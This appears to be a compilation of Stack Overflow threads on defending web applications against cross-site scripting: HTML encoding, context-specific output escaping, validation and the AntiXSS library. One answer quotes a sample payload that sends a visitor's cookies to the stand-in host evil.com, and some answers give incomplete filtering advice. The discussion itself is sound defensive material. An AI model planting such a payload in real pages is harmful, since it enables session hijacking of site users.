If I HTML encode any data entered by website users when I redisplay it, will this prevent CSS vulnerabilities?
Also, is there a tool/product available that will sanitize my user input for me, so that I don't have to write my own routines.
There are various subtleties to this question, although the answer in general is yes.
The safety of your website is highly dependent on where you put the data. If you put it as legit text, there is essentially no way for the attacker to execute XSS. If you put it in an attribute, if you forget to escape quotes or don't check for multibyte well-formedness, you have a possible attack. If you put it in a JSON variable, not escaping properly can lead to arbitrary JavaScript. Etc. etc. Context is very important.
Other users have suggested using XSS removal or XSS detection functions. I tend to think of XSS removal as user unfriendly; if I post an email address like <foo#example.com> and your remove XSS function thinks it's an HTML tag, this text mysteriously disappears. If I am running an XSS discussion forum, I don't want people's sample code to be removed. Detection is a little more sensible; if your application can tell when someone is attacking it, it can ban the IP address or user account. You should be careful with this sort of functionality, however; innocents can and will get caught in the crossfire.
Validation is an important part of website logic, but it's also independent of escaping. If I don't validate anything but escape everything, there will be no XSS attacks, but someone can say that their birthday is "the day the music died", and the application wouldn't be the wiser. In theory, strict enough validation for certain data types can perform all the duties of escaping (think numbers, enumerations, etc), but it's general good practice of defense in depth to escape them anyway. Even if you're 100% it's an integer. It might not be.
Escaping plaintext is a trivial problem; if your language doesn't give you a function, a string replace for <, >, ", ' and & with their corresponding HTML entities will do the trick. (You need other HTML entities only if you're not using UTF-8). Allowing HTML tags is non-trivial, and merits its own Stack Overflow question.
encoding your HTML is a start... it does not protect from all XSS attacks.
If you use PHP, here is a good function you can use in your sites: Kallahar's RemoveXSS() function
If you don't use PHP, at least the code is well commented, explaining the purpose of each section, and could then be adapted to another programming language.
The answer is no, encoding is not enought. The best protection for XSS is a combination of "whitelist" validation of all incoming data and appropriate encoding of all output data. Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser. If you are using .NET you can check this library http://msdn.microsoft.com/en-us/library/aa973813.aspx
You can check also some Cheat sheets to test your protections: http://ha.ckers.org/xss.html
Regards,
Victor
HtmlEncoding input gets you a good portion of the way by not allowing the HTML to render to the page.
Depending on your language items should exist there to sanitize the data. In .NET you can use Server.HtmlEncode(txtInput.Text) to input data from a textbox named txtInput.
As others have mentioned more items are needed to be truly protected.
Related
I understand why incoming data must be sanitized before it is saved to the database.
Why must I escape data I already have, prior to rendering it for the end user? If data originates from my own database and I have already validated and sanitized it, then surely it is already secure?
http://codex.wordpress.org/Validating_Sanitizing_and_Escaping_User_Data#Escaping:_Securing_Output
Because if you do not you could be making your site vulnerable to XSS.
Data is displayed to users via a combination of HTML and JavaScript, if you do not escape, user set JavaScript could be output to the page and executed (rather than simply displayed as it does on StackOverflow).
e.g. if incoming data is saved into your database, it may still contain JavaScript code within the HTML. e.g. <script>document.location="evil.com?" + escape(document.cookie)</script>
This would have the effect of redirecting whichever user views the page to www.evil.com, passing all cookies (which could include the session ID of the user, compromising the user's session via session hijacking). However, this is often done in a more subtle fashion so the user is not being aware that they are being attacked, like setting a URL of an <img> tag to pass along the cookies, or even embed a keylogger within the page.
Escaping needs to be done per output context, so it must be done when output rather than when input. Examples of output context are HTML, JavaScript, and CSS and they all have their own escaping (encoding) rules that must be followed to ensure your output is safe. e.g. & in HTML is & whilst in JavaScript it should be encoded as \x26. This will ensure the character is correctly interpreted by the language as the literal rather than as a control character.
Please see the OWASP XSS Prevention Cheat Sheet for more details.
Escaping data you believe is safe may sound like a "belt and suspenders" kind of approach, but in an environment like WordPress you need to do it. It's possible a vulnerability in a third-party plugin or theme would let someone change the data in your database. And the plugin infrastructure means other code might have had the chance to modify your data before you go to render it in the theme. Filtering your output doesn't add any real overhead to rendering the page, starts to become natural to include in your code, and helps insure you're not letting someone inject anything unwanted into your page.
It's not as huge of a risk as forgetting input validation (well okay maybe let's say "not as vulnerable to script kiddies but still a huge risk if you piss off someone smart"), but the idea is you want to prevent cross site scripting. This article does a nice job giving you some examples. http://www.securityninja.co.uk/secure-development/output-validation/
I need to sanitise user input (or output) for a web app I'm developing. The user input is just plain text, and I want to prevent HTML or other "harmful" strings. However characters such as less than, greater than, apostrophes, ampersands, quotes, etc., should be allowed.
I guess the first step is to disable request validation to prevent the generic "a potentially dangerous value was detected" message, but what else do I need to do? I can't simply htmlencode the output otherwise I'll end up with < being displayed in place of a less than character, for example.
Are there any tools that can help? I had a quick look at the AntiXSS library but from what I've seen it's just a glorified htmlencoder, or am I missing something? What about MVC - does this have anything built in?
I've never found a decent article on this kind of thing. Some say to sanitise input, while others say to sanitise output, and examples are typically over-simplistic, using techniques like htmlencoding, which will reformat perfectly valid characters such as a less than.
The Anti-XSS library is the standard library in ASP.Net WebForms for now. Though it is sub optimal. And the latest version (4.2) has several breaking bugs that haven't been fixed in awhile.
Also see the MSDN article Information Security - Anti-Cross Site Scripting.
See Should I use the Anti-XSS Security Runtime Engine in ASP.NET MVC? for your answer regarding MVC. From that answer:
Phil Haack has an interesting blog post here
http://haacked.com/archive/2009/02/07/take-charge-of-your-security.aspx.
He suggests using Anti-XSS combined with CAT.NET.
My colleagues and I have been debating how to best protect ourselves
from XSS attacks but still preserve HTML characters that get entered
into fields in our software.
To me, the ideal solution is to accept the data (turn off ASP .NET
request validation) as the user enters it, throw it in the database
exactly as they entered it. Then, whenever you display the data on the
web, HTML-encode it. The problem with this approach is that there's a
high likelihood that a developer somewhere someday will forget to
HTML-encode the display of a value somewhere. Bam! XSS vulnerability.
Another solution that was proposed was to turn request validation off
and strip out any HTML users enter before it is stored in the database
using a regex. Devs will still have to HTML-encode things for display,
but since you've stripped out any HTML tags, even if a dev forgets, we
think it would be safe. The drawback to this is that users can't enter
HTML tags into descriptions and fields and things, even if they
explicitly want to, or they may accidentally paste in an email address
surrounded by < > and the regex doesn't pick it up...whatever. It
screws with the data, and it's not ideal.
The other issue we have to keep in mind is that the system has been
built in the fear of commitment to any one strategy around this. And
at one point, some devs wrote some pages to HTML encode data before it
gets entered into the database. So some data may be already HTML
encoded in the database, some data is not - it's a mess. We can't
really trust any data that comes from the database as safe for display
in a browser.
My question is: What would be the ideal solution if you were
building an ASP .NET web app from the ground up, and what would be a good
approach for us, given our situation?
Assuming you go ahead and store the HTML directly in the database, in ASP.NET/MVC Razor, HTML-encoding is done automatically, so your negligent developer would have to really go above and beyond the call of duty to introduce the XSS. With standard webforms (or the webform view engine), you can force developers to use the <%: syntax, which will accomplish the same thing. (albeit with more risk that the developer will be negligent)
Furthermore, you could consider only selectively disabling request validation. Do you really need to support it for every request? The vast majority of requests, presumably, would not need to preserve (or allow) the HTML.
Using a regex to strip html is fairly easy to defeat and very difficult to get correct. If you want to clean HTML input it's better to use an actual parser to enforce strict XML compliance.
What I would do in this situation is store two fields in the database: clean and raw for the data. When the user wants to edit their content, you send them the raw data. When they submit changes, you sanitize it and store it in the clean field. Developers then only ever use the clean field when outputting the content to the page. I would even go so far as to name the raw field dangerousRawContent so it's obvious that care must be taken when referencing that field.
The added benefit of this technique is that you can re-sanitize the raw data with improved parsers at a later date without every loosing the originally intended content.
I have many params making up an insert form for example:
x.Parameters.AddWithValue("#city", City.Text)
I had a failed xss attack on the site this morning, so I am trying to beef up security measures anyway....
Should I be adding my input params like this?
x.Parameters.AddWithValue("#city", HttpUtility.HtmlEncode(City.Text))
Is there anything else I should consider to avoid attacks?
Don't encode input. Do encode output. At some point in the future, you might decide you want to use the same data to produce PDF or a Word document (or something else), at which point you won't want it to be HTML.
When you are accepting data, it is just data.
When you are inserting data into a database, it needs to be converted to make sense for the database.
When you are inserting data into an HTML document, it needs to be converted to make sense for HTML.
… and so on.
I strongly recommending looking at the OWASP XSS Prevention Cheat Sheet. It helps classify the different areas of a html document you can inject into, and a recipe for how to encode your output appropriately for each location.
Know that you can't just universally trust a function like htmlEncode() and expecct it to be a magic pill for all ills. To quote from the OWASP document linked:
Why Can't I Just HTML Entity Encode Untrusted Data?
HTML entity encoding is okay for untrusted data that you put in the body of the HTML document, such as inside a tag. It even sort of works for untrusted data that goes into attributes, particularly if you're religious about using quotes around your attributes. But HTML entity encoding doesn't work if you're putting untrusted data inside a tag anywhere, or an event handler attribute like onmouseover, or inside CSS, or in a URL. So even if you use an HTML entity encoding method everywhere, you are still most likely vulnerable to XSS. You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into. That's what the rules below are all about.
Take time to understand exactly how and why XSS works. Then just follow these 7 rules and you'll be safe.
I'm creating an Asp.Net program UI where users can browse and change information in a database. For this reason, they need to be able to use all forms of chars, but I still need to keep the program HTML and SQL itself secure. For that reason, I'm using a self-built method that replaces dangerous chars such as '<' etc with their html-codes while they're being handled outside of a textbox (issued on page-load so they have no functionality in there).
Now my dilemma: To be able to do this, I have to disable the Validaterequest parameter as per the topic, the program will issue a complaint. What are the possible consequences of setting it to False?
The SQL query is parametirized already, and I filter out the following marks only:
& # < > " ’ % # =
Question: am I leaving the program open for threats even if I handle the chars above? Basically this is an intranet application where only a few people will be able to access the program. Nevertheless, the information it accesses is fairly important so even unintentional mishaps should be prevented. I literally have no idea what the Validaterequest thing even does.
Edit: Alright, thx for the answers. I'll just go with this then as initially planned.
The main things Validate Request is looking for are < and > characters, to stop you opening your site up to malicious users posting script and or HTML to your site.
If you're happy with the code you've got stripping out HTML mark-up, or you are not displaying the saved data back to the website without processing, then you should be ok.
Basically validating user input by replacing special characters usually cause more trouble and doesn't really solve the problem. It all depends what the user will input, sometimes they need the special characters like
& # < > " ’ % # =
think about savvy users could still use xp_ command or even use CONVERT() function to do a ASCII/binary automated attack. As long as you parametrized all input, it should be ok.
i think that the problem is not only about SQL injection attacks, but about Cross Site Scripting and JS execution attacks.
To prevent this you cannot rely on parametrized queries alone, you should do a "sanitization" of the html the user sends! maybe a tool like html tidy could help.